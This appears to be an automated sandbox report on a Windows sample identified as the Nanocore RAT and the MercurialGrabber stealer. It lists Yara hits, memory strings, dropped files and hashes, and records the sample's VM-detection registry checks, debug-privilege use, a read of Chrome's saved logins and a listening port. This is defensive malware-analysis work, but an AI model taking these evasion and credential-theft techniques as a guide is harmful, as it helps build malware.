Source: nano.exe, 00000002.00000003.407019880.00000000012A5000.00000004.00000001.sdmp, nano.exe, 00000002.00000003.418108380.00000000012A6000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.551166452.000000000125C000.00000004.00000020.sdmp, nano.exe, 00000002.00000003.363174186.00000000012BB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: output.exe	Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev
Source: nano.exe, 00000002.00000003.407019880.00000000012A5000.00000004.00000001.sdmp, nano.exe, 00000002.00000003.418108380.00000000012A6000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.551166452.000000000125C000.00000004.00000020.sdmp, nano.exe, 00000002.00000003.363174186.00000000012BB000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^#C
Source: output.exe, 00000005.00000002.302347096.0000000002551000.00000004.00000001.sdmp	Binary or memory string: "SOFTWARE\VMWare, Inc.\VMWare Tools
Source: output.exe.0.dr	Binary or memory string: SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdevkSYSTEM\CurrentControlSet\Control\VirtualDeviceDriversESOFTWARE\VMWare, Inc.\VMWare ToolsUSOFTWARE\Oracle\VirtualBox Guest Additions1HARDWARE\ACPI\DSDT\VBOX_SSYSTEM\ControlSet001\Services\Disk\Enum\0cHARDWARE\Description\System\SystemBiosInformationYHARDWARE\Description\System\VideoBiosVersion]HARDWARE\Description\System\SystemManufacturer[HARDWARE\Description\System\SystemProductName[HARDWARE\Description\System\Logical Unit Id 0
Source: output.exe, 00000005.00000002.301549791.00000000009A0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSS

Anti Debugging:

Enables debug privileges

Source: C:\ProgramData\nano.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\ProgramData\output.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\nano.exe "C:\ProgramData\nano.exe"			Jump to behavior
Source: C:\Users\user\Desktop\4Y85lSOUJ0.exe	Process created: C:\ProgramData\output.exe "C:\ProgramData\output.exe"			Jump to behavior

Source: nano.exe, 00000002.00000002.552908452.000000000332B000.00000004.00000001.sdmp, nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: nano.exe, 00000002.00000002.552041989.0000000001940000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\ProgramData\output.exe

Queries volume information: C:\ProgramData\output.exe VolumeInformation

Jump to behavior

Queries the product ID of Windows

Source: C:\ProgramData\output.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\ProgramData\nano.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\ProgramData\nano.exe

Code function: 2_2_011DAF9A GetUserNameW,

2_2_011DAF9A

Stealing of Sensitive Information:

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\output.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\default\Login Data

Jump to behavior

Remote Access Functionality:

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Detected Nanocore Rat

Source: 4Y85lSOUJ0.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: 4Y85lSOUJ0.exe, 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: 4Y85lSOUJ0.exe, 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nano.exe, 00000002.00000002.552500603.00000000032A1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.552500603.00000000032A1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: nano.exe, 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe, 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: 4Y85lSOUJ0.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe.2.dr	String found in binary or memory: NanoCore.ClientPluginHost
Source: nano.exe.0.dr	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\nano.exe	Code function: 2_2_054D29FA bind,		2_2_054D29FA
Source: C:\ProgramData\nano.exe	Code function: 2_2_054D29D7 bind,		2_2_054D29D7

ID:	553230
Product:	CloudBasic
Start time:	14:15:24
Start date:	14.01.2022
Sample:	4Y85lSOUJ0.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	4f439877b84b51b8caa48ae81e1d2363
SHA1:	defde1263c0ca2d604226cff86e4045a28650ab4
SHA256:	b05b740309562ab6160cc3eb8ed2f0dd839d53c6c71f67bf40aeeb3f580eeb0a
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	94115D1343C7C81682FE2D48CB9F8B96	EE73AF63C59A93511797A53C1ED74A87892E75B3	D9BA471F10C78E3DFA01274B8601FDFF6F0D7971824D24D50DF21F619A1AB502
C:\ProgramData\nano.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	94115D1343C7C81682FE2D48CB9F8B96	EE73AF63C59A93511797A53C1ED74A87892E75B3	D9BA471F10C78E3DFA01274B8601FDFF6F0D7971824D24D50DF21F619A1AB502
C:\ProgramData\output.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	BF3C8FF8097814C773B0E86495FD0013	26E160C7D502509A1694BB5660105E5F09C3C709	9E760C9961936C729F09364FFF9CFC9C1B4EC878A2B47CE7DE4DF934E77582AF
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\4Y85lSOUJ0.exe.log	ASCII text, with CRLF line terminators	1F5C279D069793BFDB15F6DAC63D5C39	EFA436296EE3BC196FFC4FBD48978A4A1BB6FD34	007D94877B5C9048FDC238CF6E63516F2BF398588878947E1DC4A4E55553602D
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\output.exe.log	ASCII text, with CRLF line terminators	188CF934CB79EB8F7AC3A3BF4DFE3215	1C35FDBECCBD1E503537023C648C8A57DC28B6A0	3C567A4DFCC7E4BBD4CF46E16BDBDBEA4F6847B9AA5415386037D9F4415D0C69
C:\Users\user\AppData\Local\Temp\Capture.jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3	3ADE500A91D29FA58420E0525BC75A28	50B8C5C63A5E888FB5C597E4C8309B28582349B1	B706B4BA63D7E7B38F1634DC56C6C79F9E50146F0BDF768538FD185D78172A70
C:\Users\user\AppData\Local\Temp\login.db	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat	ISO-8859 text, with NEL line terminators	422B7CAAD47F1D1F5B175909EE6BC048	066D9B088F35E10D06F359A46E819F7B9F267B79	608681E5ED9F0A359A01153FCF482554BF15F41D4D56260C754C64A49EEA08E3
\Device\ConDrv	ASCII text, with very long lines, with CRLF line terminators	7284B410862910B2301A546863199AEA	8CB47F8ADE08AA3D4AACF6110DE30692B6D88CDD	B1948EFAF1D54550F58C31E12D65D45C7005F13A04EE1F0E33C6E5D908572BE2

Windows Analysis Report 4Y85lSOUJ0.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs